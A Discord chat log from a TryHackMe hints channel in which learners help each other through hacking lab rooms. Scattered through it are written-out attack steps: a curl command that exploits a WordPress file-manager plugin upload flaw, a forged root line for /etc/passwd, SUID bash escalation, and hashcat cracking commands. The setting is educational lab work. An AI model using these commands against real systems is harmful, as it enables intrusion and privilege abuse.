#room-hints

you must be a glutton for punishment 🙂

I was doing a room a few days ago that had a website about trading in vim. Made me actually laugh out loud.

🤣

@led https://tryhackme.com/room/owasptop10 task 25

@median reef @led I figure I could do it like this
Using curl
curl -ks --max-time 5 --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1576045135" -F "upload[]=@//tmp/mypoc.php" "http://127.0.0.1/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

yeah you can convert it to python also

that is what i did

Nice

@median reef In the video I'm going to make for badbyte I'm going to show three ways of uploading the payload on I'm gonna show the Metasploit way,your script and how to manually do it. I'll give you credit for your script

❤️

whom will you give the room credit too 🤣

electronforce and Raccooninja

i am electronforce

i knw

ah i thought you missed

anyway dm me the feedback if you have any

I GOTT ITTT, dude that room took me 5 hours

🎉

Yeah, I ran out of extensions on mine

wouldn't have gotten it without the hints

hey guys what's up? coul you help me? I got stuck on task 4 from network services 2 as you can see I got the bash executable in my ssh but when i try to execute it, this doesn't show me any flag. could you help with a hint or something?

this are the permissions that I havr

It needs to be root owned with suid

It's not root owned

but then what does this mean?

I used chmod +s for that

Luis what are the permissions?

-rwsr-sr-x

Like Ninja said it needs to be owned by root
sudo chown root. Bash

oh ok

man but i used this command line before as it says in task. Isn't right?

Chmod changes permissions
Chown changes the owner

oooooooh

Chgrp changes the group

man but here says chmod

Task2 states to run
Sudo chown root bash

ooooh yeah i got it

Prior to running the chmod command

yeah yeah i skip that step

skipped

now i got this

Run it again

Then type:

whoami

You're root

Or you were

Ninja is correct....
I was trying to let Luis discover that....
You'll need to look around for the flag.

I rooted the badboy box

I'll try with this

I have two questions about badbyte what is the cve for the transversal directory (I can't find it) and for the curl command "curl -ks --max-time 5 --user-agent ..." ne not working and I do not understand why. a little hint would be welcome

Hello everyone! Hope u r doing great...!

I need help with a Nmap Question... I was doing EVERYTHING the task says but i'm not getting the answer (i think :v)

Command...

Response (1/2)

response(2/2)

and... Sad face. :'v

The VM is not up

Redeploy it

man it says cappucino i guess that should say root

Screenshot.

I cannot see your screen or what you did or what you're seeing RN

You exited the root shell

So you're not root anymore

Hmmm.. D:

it dies after an hour

It needs a fix

now?

Hmmm... So it took me too long to get to that question... Hehe. Thank's, NinjaJc01 | James! 😄

help please

Now you're root, as it says

So you need to get the flag

yeah I did it after several tries hahaha thanks

In CC Pentesting Task 10 I Keep getting no session created. I've checked my ip several times. I'm using open VPN and a Parrot VM

LHOST?

That's what I was thinking i'm trying to grab a screen shot

I can't seem to post a screenshot

!docs verify

Follow those steps

Thank you

LHOST is wrong for sure

Needs to be your THM VPN IP

Ok i though it was the VM IP

hey guys I am solving ARcHanG3l.I found the other hostname and also the test page but I could nt proceed forward.Tried a lot but couldnt find the lfi.Anyone wanna give a nudge?

i tried for ages doing the LFI on that room, couldn't get it working

gave up

I am slso trying for hours now.Tried different wordlist,tried manually but I am bout to give up now

man I will refer the writeup now

It is meant to be an easy room.

I need to level up seriously

lol why someone deleting my comment

Did anybody here complete EnterPrize Room???

Need a hint on Reverse Shell Part

need some help on foothold for broker please

Hi guys, I'm currently doing the Buffer Overflow Room, on task 8 I'm trying to pass as argument to the binary I'm exploiting the output of a python program, but I receive this error, does anyone have a hint to solve this issue?

Use Brup To Get Web Shell into Machine Metasploit Module for that exploit isn't workn

There are POC's on github similar to metasploit that works

Hey is the broker room buggy?

Cant connect via mqqt clients tried 3 different ones

need to specify the version of mqtt running

The version of the software/website is old... I'm sure you can find a CVE 🙂

@modest swift ty! 😉

Just finished BadByte room. What a lovely challenge that was. Excellent work of electronforce & Raccooninja. Bit on the end of easy, I guess.

Yeah true

probably bc it was guided

it was tagged as easy

But was fun learning new things about dynamic port forwarding

definitely

Love the way the passwords were hidden!!

True

Btw it's #room-hints we are chatting in

I hurt my eyes looking through the || auth.log since the user was in the adm group lol ||

hahaha, I think I got it a bit simpler. But it took a while before my fried brain cooled down enough to see it.

Oh no spoilers please man

Noice

yw buddy<3

Keep 'm coming, mate. You 2 are a good team.....could apply for a job as torturers!

theres a rumor about ||another room||

I'm in before you open the door to it! Write me up.

gotta love all the love;) <3

You guys deserve it!

Truely deserving person right Ween

currently working on badbyte, I have managed to gain access through a CVE and now having some trouble searching for credentials. what are some common directories that you all have seen in a *nix host to be of interests for things like that?

other than config files and logs and whatever may be in their home directories

look into home directory there might be a hint

@median reef damn totally missed that one lol thanks!

that was a fun box

Linux Fundamentals Part 1 I only can find the login credentials from the video and not on the page. Is there a reason behind 🙂

Because you don't need to SSH on because there is in browser access.

You're taught SSH in Linux2

ahh ok 🙂 thanks i connected through ssh with the credentials from the video makes sense for me thanks fro your help !

guys can you some one help in this room
https://tryhackme.com/room/badbyte

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

@stuck fractal ok

i am in room
Badbyte
and in Port Forwarding i connect b ssh and t Forwarded the port 80 from 8080 using this commend ssh -i id_rsa -L 8080:127.0.0.1:80 ...

but i dont know this qutiotn What main TCP ports are listening on localhost?

@stuck fractal .

agh idk why its not working when i type in the pinguftw password

it worked yesterday

it just seems like today it isnt working

i did ssh shiba2@(my machine's ip)

that worked

except the password part

Where did you get the IP from?

From the top of the website where it's green

Its next to the attackbox

That's your attackbox's IP

Not the deploy in the room

Click deploy

i totally forgot about that

agh i feel so dumb

thank you

Could use a hint on Badbyte on the last section. Hunting for the old password.

Found it! Fun box, thanks to the creators of it. Had me stumped there for a second.

hey guys, I am looking for hint what can be wrong Common Linux Privesc room for "Exploiting Writeable /etc/passwd" I still getting Authentication failure when trying to log in with new user. New user line looks ok new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash in /etc/passwd while it passed in task. Edited user7 which has root right to this file.

escaping $: new:\$1\$new\$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

Honestly I'd use single quotes because it's easier to read

my failure, wrong password

Can we ask hints for Tokyo Ghoul yet?

Nope

Not til 17th 7PM GMT

guys can someone give me a hint about H1:Medium koth machine?

Do not provide or ask for help or hints for the Tokyo Ghoul room until 17th March, 7pm (GMT)

hey did anyone else have an issue with nmap running the script for finding the vulnerable plugins on badbyte

is the embargo on broker over with yet?

Yep

ok thanks I need a nudge i have a mqtt client running I've subscribed to the topic but not finding any info on how to retrieve the conversation from the broker what should I be googleing to find the command i need to use

Are you using MQTTfx?

no I'm trying to use eclipse mosquitto

Research what wildcard can be used to subscribe to all topics in the broker.

i already subscribed im trying to find the command to retrieve the conversations on the broker

Search a writeup and see what they use and how

I dont rmemeber the client i've used but i remember that there was 5 messages looped s

This channel is not for recommending that people read writeups

This channel is for hints, before looking at writeups.

Then mqttfx is the way

That should be in the documentation for mosquitto. I used MQTTfx. 🙂

there is not any write ups yet but thanks any way

i downloaded MQTTfx but not finding how to set it up to connect to the broker

You got the IP and port. The rest is fairly straightforward to figure out.

I had issues getting anything out of MQTT and ended up using Google Chrome App MQTTlens https://chrome.google.com/webstore/detail/mqttlens/hemojaaeigabkbcookmlgmdigohjobjm?hl=en

That's what I used as well.

Look dms theres

thanks i figured it out all that trouble to answer just one question uggggg

Hi I am in introductory networking and have downloaded task files for Task 5. I haven't used Wireshark before and am having trouble loading these files. Any help appreciated.

What do you mean? Do you have wireshark installed?

yes

It's on the attack machine

Ok, so you need to get the files on the attackbox

Or download wireshark on your own machine

Yeah need to get them on attackbox

I have onot my machine and now need them on the box

Ty @stuck fractal I got the CC Pentesting Task 10 completed. I had to use the attack box on the TryHackMe site. I couldn't get a shell with my Parrot VM. I could never get a LHOST address that worked.

It needed to be your tryhackme VPN IP

tun0

I use open VPN on my host and a Parrot VM. I tried ifconfig on both but neither of the ip addresses would work. the Tryhackmd vpn ip i got started with 10. but I couldnt get it yet.

You need to run it in the VM, not the host

I mean you can run it on the host but then you need to port forward for the reverse shell port

And every other port you want to use.

Just run the VPN in the VM.

ok i'll run the VPN on the VM. I guess the 172. address on the VM is just going to the host. I just started using VMPlayer

I guess the 172. address on the VM is just going to the host That doesn't make much sense. The 172.16.x.x IP is probably from a NAT network in VMWare.

does VMWare doen't conect directly to the internet does it? i was thinking it had to go trough the host OS to connect.

It can be bridged to the network, but that isn't what I said

For BadByte, are there any additional hints aside from "basic linux enumeration" for finding the users' old password?

Make sure you thoroughly review everything in the user's home directory.

ah i found it. thanks @short fox !

what issues?

when ever i used the nmap --script http-wordpress-enum.nse --script-args search-limit=1500 -p 8080 127.0.0.1 -oA nmap/wpscanplugin it would take forever to scan but when i use nmap --script http-wordpress-enum.nse -p8080 127.0.0.1 -oA nmap/wpscanplugin it works fast

do you get the same results?

I did a wp scrpt scan last night and it took a good 30 minutes to finish even with the script args

yeah i got the same results

by default the nmap scans less plugins

1500 is more then default so it can take long time

try using attackbox if you network connection is slow

it will help reducing the scan time

can i ask for the hints for the room hacked

No

Well I guess writeups are approved but technically no

i dont see any writeups options there

Try harder

i am trying but wireshark looks scary for me but anyways i;ll find some thing

Not what I meant but ok

you meant not to search for writeups and try harder

i guess

i dont thiink he will give this advise

yes that what i meant when i said i'll find some thing

I need some help with privelege escalation to root in arcgangel.I found the binary also analysed it with ghidra.I have an idea but dont know how to implement it.Anyone wanna help?

In how much time our writeup got verified?

Depends on the room, creator, room age, write-up content etc.

Nobody can give an exact date.

Hey guys, could anyone give me a little hint? I am stuck at question 16 from the Investigating Windows 3.0. The question is 'This is the default communication profile the agent used to connect to the attack machine. What attack framework was used? What is the name of the variable? (answer, answer)' Thanks!

Did you execute the binary on the victim machine itself? That way you could get an idea, what the binary does

wut

i executed it but had to refer to the writeup.Didnt though about path var manipulation.

First thing is the two answers are the wrong way round from the question, so the framework is the second word. It's a well known tool which you should be able to identify with a bit of google. The variable refers to a value the attacker would have been asked to set when launching the attack, so you have to look at how the tool works (bit of an odd question since, as it says the attacker left it on the default setting but there you go)

ah okay! This will help me alot, Thankyou very much! 😄

hey guys could u help me here? task 6 from metasploit's room

What do you see when you run ps?

i use the ps command but doesn't show me any spool process

You do not have a shell on the target

you need to run ps in a meterpreter

Because currently it's running ps on your local machine

On your kali.

man but i did everything from task 5

Doesn't matter, if it didn't work then it won't work

But how do I know what I did wrong?

You don't. That's why you ask for help.

Ok

I noticed something weird

hey, I'm on Skynet, got the user's password for smb share but as if it's not correct, I can't manage to log in

is there something else I'm missing here

!docs verify

Follow those instructions, screenshot what you're doing

how can i open information.txt file

Read up about smbclient

i keep getting this message, any other hints??

It has spaces

Spaces are used to seperate arguments for commands

anything else to use beside escape character ""

Can anyone help me out from the last question of Task-6 of "REmux The Tmux"? I am stuck on this question from last few hours.

The question is: "How can you run the desired plugin after loading it?"

Thanks.

Room badbyte

I am stuck on finding a CVE for RCE

Did nikto, wpscan, nmap

searched manually for it by wordpress version

still no clue what is the CVE

Can anybody help

Did you run the expanded nmap search like it says in the room hint? If not do that.

like with -vv ?

Otherwise i really don't know what expanded nmap scan is

Ok there's an nmap script you can use to enumerate wordpress. You need to find that and run it, but with the search parameter set to 1500 plugins instead of the default 100.

@candid nimbus oh damn i totally missed that even wondered what that parameter meant

thanks

found it finally

👍 good job!

you can also try an aggressive plugin search with wp-scan but it takes a bit longer

nmap is probably better tbf

Hello all, Need some help. I am stuck in Pentest Task2 Nmap. in last there are around 4 questions, which answers i could not find on nmap chart and even not on google.

Can you please help me out ?

Question : How many ports are open on the machine?

you need to scan the machine using nmap

check how many open ports from the scan results

I told the same in #room-help don't double post your question

Thank you Nick and Auger sir, i am doing it right now. Sorry as a new member , i did not know that where to post question.

Hey, maybe someone has idea why I can't see files downloaded with smb to my download folder:

server running in Downloads folder, but there is no subfolder kali

You're in Kali.

They aren't the same filesystem

It's a VM. It has it's own filesystem.

Wait where are you looking?

I am expecting files in /home/kali/Downloads/kali

Why?

The sharename is Kali

Not the local path.

aaaaa... thanks 🙂

So this isn't a specific room question, more of a generic rookie question. I've modified the php-reverse-shell.php with my tun0 IP and my listening port, and started nc -lvnp on that port. I upload the shell file to the ftp server, but it's not retaining the chmod I set it to before uploading (for a test, I tried chmod 777 before uploading, but it only has -rw--------- on the ftp server). When I open that page in the browser, nothing seems to happen, and my nc listener never connects. Am I missing something obvious?

on what room

This was in the "h4cked" room. I completed it using a different method, so I don't need a hint for the room, just wondering if I'm missing a step with file permissions (or something else?) for reverse shells in general

when you where looking at the pcap file did you see how the attacker did it?

You can upload your shell and modify its permissions afterwards. Chmod is a valid ftp command.

hm. I thought I had tried that and it didn't work

maybe I used the wrong syntax

In that case I don't know, I did the room earlier today and could make it executable. I'm also pretty new at this. You could maybe try with +xmethod instead?

I'll have to read up on that, I'm not familiar with it

As a general rule- what permissions need to be set for reverse shells? Does it depend on the type of shell? is read access enough, or is executable required?

it would look like this you need to put yourself in binary

that must be the missing step. I didn't enter binary mode. I'm not familiar with that in ftp, so I'll have to do some reading

yeah i know i wasn't familiar with it as well i had to do some research the best part of learning

Hence my name :). I've got a lot to learn

chmod should be on the uploaded file remote in ftp, not locally. Also the key right is likely read all - since www-data must see it. Binary mode should not matter since is a php file - so text. But maybe you fixed all this already.

don't remember having to chmod the file

https://tryhackme.com/room/vulnversity
In this room in Task 4 I have to use Burp to capture the request and then fuzzy the file formats. Even though I am using the formats specified in the task for fuzzing each of them are showing up as "Extension not supported". Then the checked the solution and found that the allowed extension is .phtml when I try that manually I can see that file of that extension is allowed but with Burp its showing "Not allowed"

Any idea what I could be doing wrong ? Or this an bug ?

When I try to fuzzy using repeater it seems to work but with intruder is seems to fail

Check the payload enocoding

You don't want burp to encode the fullstop

Ohh okay I will try that

how much time does a machine takes to scan?

well, using rustscan for me lately its been very fast

Depends on the machine and scan type

but yeah there are heaps of different types of 'scans' if you are nmapping all ports with default scripts it can take like 30-40 minutes

(maybe longer)

For Inferno room, I can read here that the auto logout is intended behaviour. Is there a hint on how to go about this?

try another shell

Hi!
Can someone help me out with

Hash: e5d8870e5bdd26602cab8dbe07a942c8669e56d6
Salt: tryhackme
I used this:
hashcat -m 110 e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme /usr/share/wordlists/rockyou.txt
I don't know is it ok or not.

output:
Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Name........: sha1($pass.$salt)
Hash.Target......: e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme
Time.Started.....: Mon Mar 15 21:43:20 2021 (5 secs)
Time.Estimated...: Mon Mar 15 21:43:25 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3246.5 kH/s (0.30ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]

Started: Mon Mar 15 21:43:19 2021
Stopped: Mon Mar 15 21:43:26 2021

It's Crack the hash room

If it's exhausted, then you probably need $salt.$pass here

exhausted means it ran through the whole wordlist and couldn't crack it

So either the wordlist doesn't container the password, or the pass/salt was the other way round in this case

so what will be the command

I think you can work that out yourself.

Hello

don't you need a . between and not a :?

I'm just starting out with linux and I'm doing the challenges.

For the life of me, I cannot find where bob's history is being stored.

history is generally stored in a particular file in the home directory, but it's usually hidden

"HIDDEN" gotcha

thanks @ripe hedge

ls -la

it's a shy file 🙂

I figure it out that the mode was not right it should be 160

after -m 160 it's work perfectly

oh ok, it was an HMAC

Hi
In lian yu rooms, i find the directory island/2100 and in this website source there is writing "you can avail your .ticket here but how? "

Can someone help?

I found it can someone give me the quick answer "-la" is that list all?

pretty much

-la is -l and -a

-l is long I think, -a is all

makes sense

Yeah

-l use a long listing format

But i stuck with:

Hash: $6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.

Salt: aReallyHardSalt

Rounds: 5

@steady stratus u at a PC RN?

Yassss whattup?

Doing a bit of AWS stuff so I can get to w/e in a few mins

On crack the hash, on that question, the number of rounds is wrong

what exactly is the problem?

did you find the ticket?

No

How can i find the ticket

well it's a .ticket

probably want the rest of the filename

But im still on the Web

yup

how'd you find the 2100?

Gobuster

why not try that with the ticket?

Okay

Update: i find it, thanks

good hunting

What is the correct round

?

The default.

according to hashid it is sha512crypt

and according to the page https://hashcat.net/wiki/doku.php?id=example_hashes sha512crypt (1800) do not take any salt in the example templete

so should i add salt or not

.

I would just like a hint if possible. I'm looking for where cron jobs are created. I see the location of where it's listed, not sure if it's the same place as it's being created

It is salted.

Sha512 is salted out of the box

You just do not need to specify the salt separately because it is a part of the hash

I used
hashcat -a 0 -m 1800 '$6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.' /usr/share/wordlists/rockyou.txt

is it ok

Did it work?

Stop asking if it's ok. If it worked, then it's OK. If it didn't work, then it's not OK.

This is a lab/learning environment

Its running .....

Try things.

for the last 30 min it's running

are you running hashcat in the VM?

rookie question- I did an:
echo "$6$Tb/eum.......hash chars" > hash.txt
when I cat or subl that file, the $6$Tb/ is stripped off. Why is that? Those aren't escape chars, right?

$ is a special character

Used to access variables

no but it's interpreting them as variables

use single quotes

VM

yeah that'll take a while as hashcat really likes GPUs

I think that's why it is slow

ah, I hadn't tried single quotes, or considered the vars injection. Thanks.

run hashcat from the host, or use john in the VM

people say good things about collabcat

it took me 25 seconds with a GPU so...

Thanks for the Advice!!

it's pretty deep in the wordlist

14344385

yeah it's around the 3M mark

yeah

Sorry to be a pest, did anyone get a chance glance at my question?

I'll take a look in a couple of mins (:

ask question instead of asking question about question

Do you know what the rounds should be by any curiosity? I'll take a look into it but I'm lazy w/ other things kekw

I did ask a question the first time.

🤣

Didn't want to spam the chat...

I think led (and I don't want to speak on their behalf) was aiming at asking you to provide a link to the question that you asked

Appreciate you don't want to spam the chat -- but it's fast flowing in here and things get buried quick 😄

I would just like a hint if possible. I'm looking for where cron jobs are created. I see the location of where it's listed, not sure if it's the same place as it's being created

If you state your problem clearly, you will probably get the fastest response.

People aren't ignored intentionally

The bare minimum of information you should give us when you're asking a question here is room, task, and question

Crontabs are stored in a directory by the user that creates them

I believe it's the same place as when you are creating them / writing them but as something like a .tmp

thanks.

Ah, they're not in the same directory

but when writing they're stored temporarily

then when you save it, it'll be stored in the correct directory depending on the user you created it as

i.e. crontabs created as root will be stored separately to that created as say "cmnatic"

there's also the crontab in /etc

That's is where I'm currently and don't see the flag, so I'll check the other location.

flag probably won't be there directly

which room/task/question is this for?

We ask that you help us a bit so we can better help you 🙂

linux challenges flag 4

Flag 4 is located where cron jobs are created.

Thanks I'll list it the proper way, again, this literally my first day using the discord

Hello i am trying to do LinuxAgency, i can not solve the question: What can you find on this service? I've rooted the machine and can prove it but it really bothers me that it shows that i have not completed the room

are you sure that's the right room?

it's likely in /etc/crontab

Yep, in task 2, i really can figure out what it is asking for. I've tried all sort of answers

LinuxAgency?

Because this is task 2

Yeah you were right lol

I am sorry room name is GoldenEye

ah, haven't done that one yet, sorry

@pine reef if that's the question I think it is, it's a badly worded question

I don't know exactly what question you're asking about, but it might be the one that's actually asking 'what tool do you use to interact with this service'

Is it 6 characters?

I think the question is quite clear. What can you find on that service? Considering what service is running ..... ?

BTW, it is Q 5 of task 2.

Yeah

I'll take another look at it

Well you can find mails on that service, i am pretty sure that is the answer but it is not correct

Yep, and now think a little bit more and you're there.

Completed it, wth...

I am not even going to turning off my instance because i am so mad

🙂

🤣

guys i'm stuck at golden eye room
i'm in the website as admin but i can't get a reverse shell

how can i do that?

I haven't done that room, and I'm a rookie here myself. Are you able to upload files to a web server?

i can upload files so i tried to upload a rev shell but once i click it
it starts downloading the file

what's the file type? is this on a linux or windows machine? when you say 'click it', what program/window are you clicking in?

You looked at other services running on the box? Can you access anything else with the creds you have?

you need to go to the page for the file

there's no ssh
the password is only valid on the website so i don't think i can access anything else

Yeah. There's no SSH but, there should be some other stuff...

Also.. If those creds don’t seem to work, can you use another program to find other users and passwords? Maybe Hydra?

bruh i finished the part long ago
i found alot of users || boris natalya xenia doak dr_doak all the way to admin || what should i do next?

Which task are you on? You made it sound like you're still doing Task1?

last question on task 3

i said im in as admin sorry if i wasn't clear

Take a look into Aspell, the spell checker plugin.

And no, I think I just miss-understood 😛

yup that's what the hint says but i couldn't figure it out

|| what does the path look like... Maybe you can point it towards another program? ||

thx bro i did it

i just have one question
in task 2 question 3 it says what service is runnning on port 55007 and it's pop3
i tried pop3 \ dovecot \ popt3d but none of these is the right answer

On goldeneye?

It's asking for the program you use to access it.

I realise it shouldn't be

I reported it as a bug.

yup thought so

@opal vine what does the service let you send?

or receive?

I can't seem to get the reverse shell working on GoldenEye. not receiving any packets on the port I specified

try a different payload, maybe upload a binary

I am solving year of the rabbit room.But no able to get anything useful yet.NEED some help with initial enumeration.Anyone wanna give me a nudge?Thanks in advance😉

Take a look with Burp.

so I was actually dumb and didn't change the default spellcheck settings

i think i stuffed around with that for ages, from memory, dont worry

I found the msf payload on exploitdb and then it clicked

reading through it

anyone got OpenVAS to install on the attack box? I've tried pulling the docker image but it seems there is not sufficient space.

it's a 7 GB image

copying a link of this: #room-bugs message

the attackbox is getting additional space as tools for the networks gets added but aye

I hope this clarifies things a bit better. I'll have a discussion with the owners on balancing the costs between making things accessible & the costs behind it

Obviously we wanna include as many tools as we can on the attackbox but it's not all that sustainable for both performance & costing esp. when things like OpenVAS is 7gb or something like that

no probs, thanks for the clarification

I'm adding more storage space on the next push -- you might find that you can add the image okay

Hi, could someone help me? I'm doing the "Buffer Overflow Prep" room, in OVERFLOW5 when i run the command "!mona findmsp -distance 2400" it doesn't show the EIP offset, i tried to convert the address to obtain the offset with pattern_offset but it failed. In the writeups the command works 😦

Happy St. Patrick's Day Everyone. I'm hoping someone can point me in the right direction here. Working on the Windows10privesc room and I'm getting stuck with Task 11 and dumping out the hashes from the SYSTEM and SAM files I copied onto my Kali Linux VM. The step tells me to use the creddump7.git repository but I'm not able to locate/install python-crypto and in turn not able to run the "python2 creddump7/pwdump.py STSTEM SAM" command. Is there an alternative way for me to dump these hashes?

There's a python3 version, or you can use secretsdump from impacket @earnest plover

Ok, thanks I'll take a look at those.

sorry to reply late but it's a pop3 service which let me send and receive emails

i think you are talking about question 5 from task 2
but i'm talking about question 3 from the same task

Do not provide or ask for help or hints for the VulnNet room until 20th March, 7pm (GMT)

Currently stuck on looking glass. I would really appreciate a gentle push in the right direction, as i am out of ideas and have basically been staring at the screen for two hours now.
I was able to obtain the user flag.
What I have so far:

||- Tweedledum and Tweedledee users can invoke bash shells under each others UIDs

• Password for humptydumpty can be found in the tweedledum home directory
• There are execution permissions on alice's home directory but no read permissions. I was thinking maybe one could try to bruteforce binaries in there but i dropped that idea
• The onlty thing that seems to distinguish humptydumpty is the poetry.txt but I cannot make use of it
• no further valuable sudo permissions , crontabs, SUIDs, ||

Did you find the file with hex in it?

||you mean the one containing the password for humptydumpty? yes||

Ok, check file permissions. Linpeas should catch something there.

No

You can talk the creator, perhaps, but don't ask here

@fierce stratus DM me if you have any questions

god i'm either blind or stupid. i'll try again tomorrow, it's getting late here. thanks for the hint anyways

ooooor you're neither and it's just something that's super easy to miss.

What do you mean?

it listens on 0.0.0.0:8000, running a HTTP server

You then need to GET the file from it

read the pins please

oh ok

oh sorry my bad

Got a question with the upload vulnerabilities room

Everything is going well but everytime I upload something I get a 500 error. Even when I just upload a legit, accepted image it's not accepted and I get a 500 error

Is it broken or is it supposed to be that way?

that one trolled me for a while

lol, sorry, i got something totally different for that question, its a very old protocol

hmmm what is that port really used for if not for mails?

It's not asking for the port

It's asking for the program you use to interact with it

It's a question that needs fixing

I cant remember how i came up with the answer i did

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

hey has anyone done vulnnet yet

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

ive done my research dude

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

awww i see my bad

oh then it's || telnet ||
but you can interact with it using nc too
i think it should be precise too

I reported this as a bug a while back

Feel free to report it again in #room-bugs

Hello, in "Brainstorm" machine, the answer to open ports is higher than the number that I'm getting.. I've checked a write up and he is getting the same port number. Am I missing something?

Hello in basic pentesting, rooms asking me what is username how can i find it, i Just know these username first Letter is k and j

u gotta enum more

The question is what is the username

try using a tool called enum4linux

it will show u some interesting users

Okay im going to try, thanks

😄

did you find the username

Yeah

good dont be afraid of using the write ups remember its all about learning

Hello do you know if there is any writeup for room investigating windows 3 ?

3, is that like 98?

There don't seem to be writeups for them and not sure if the creator will accept them or not

Ah ok will keep struggling with it then

Just a few questions left unsolved

I tested the room, so if you need help lemme know 🙂

There is one question regarding the attack framework and the variable used that I didnt get

As per my understanding it is empire that is used

But i tried many answers, without any woot woot

The questions and answer are the wrong way round.

Will try it asap. Thanks !

just finishing rooting VulnNet great room

im going to be posting a video on youtube on VulnNet on Monday if the creator is okay with the time line to post a walk through

Hey newbie here, doing the nmap room, at the praticle, i'm ask to do a TCP SYN scan of thye first 5000 ports. doing it with the switches -sS -Pn -p 0-4990 but still see 0 ports open. Is there something i did't understood with how to run a TCP SYN scan ?

!docs verify

Follow those instructions, then you can send a screenshot

hey guys I'm in task 9 from network services 2 and I got stuck here cause I don't know what is the username or password could you help me?

You are given it in the task

Read back through the MySQL tasks.

oh so the username is root and the password is "password" I thought that was an example lol. Sorry for that question haha

@stuck fractal here it is

Checked your VPN?

looked like the open vpn command worked but apparently not ... gonna try to fix that thanks

checked and I have correctly set up the vpn but still have the same output

hey guys I'm in the task 10 from network services 2. I usa trying to crack the password of carl from the hash but it has take more than an hour so I don't know if i did something wrong

you need to specify a wordlist or it will use a default list

incremental ASCII will crack any password, if you have a lifetime to wait for it

I tried my luck this morning with a few answers but still not able to get the correct one. Also stucked with one of the last question regarding the reg key being queried by attacker, I tested all the ones I could find in Procmon at 6:07 but no match ☹️

https://tryhackme.com/room/kenobi
I have a doubt regarding the Kenobi room. So in Task 1 there is an question to find the open ports on the system did an scan and got 11 ports open but the correct answer is 7. Is this a bug or am I doing something wrong ?

I guess it's because it is asking a basic nmap scan (without the -p- switch)

how can I enumerate bolt cms version?

coudnt find the version.php file

Ok. To clarify the name of the variable you are looking for is in the framework you found. The attacker has to set certain values before launching. (In this case they left it on default).

i ended up downloading the file to my computer running strings on it then grepping the result, not the best method, but it worked, its like finding a needle in a pile of needles

Thanks for the hints guys. Will look into that this evening.

Maybe I will do Empire room first.

probably not a bad idea

I'm trying to do Brainstorm - I've got the file(s) from the host and transferred to a windows 7 VM, however it just quits instantly instead of running like I'd expect

I feel like this isn't supposed to be the challenge of the room

You got the .dil file too?

Run that chatserver as administrator and on your machine do "nc {your windows machine IP} 9999"

I did this and it's working fine

@silver otter

I got the dll file too, and when I run it, admin or not, it just quits straight away

re-downloaded it too and same issue hmm

I ran that chatserver file as an administrator

And it works fine for me

Firewall and windows defender should be 📴

yep both off, i'll try some more stuff later and maybe try on my main pc lol

can someone give me one more hint for "OWASP top 10" task 19
I watched all files, but didn't find anything helpful

@rugged flame You need to do more than look at the files on the box. Search the internet, find the documentation and source code

for what do i need a documentation ?

You'll know when you read it. ¯\_(ツ)_/¯

hah, ok=)

oh, it was so easy task(

can someone help?

Please research your questions before asking.

yep

Also, please state the room and task and question as basic info

its blue

... That too

Seeing as we have no idea what the question is asking about without it

It's not

rpwebscanning

its task 2 first question

ops lol i had a similar question

Read the manuals and do research before asking here please

i have

legit looked everywhere

Then you'd have found it

Read the manuals

any hints for room blue im stuck at

[-] 10.10.162.126:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.162.126:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.162.126:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

You should verify with the bot

Then you can post screenshots

Then run show options and screenshot the output

Ok, did you see where I said screenshot?

ok ill do it

Room: Upload vulnerabilities
**Task: 9 **
you will need to access the shell directly using its URI. What does this mean? should I use the full file path??

Yes, it does.

You need to access the file directly.

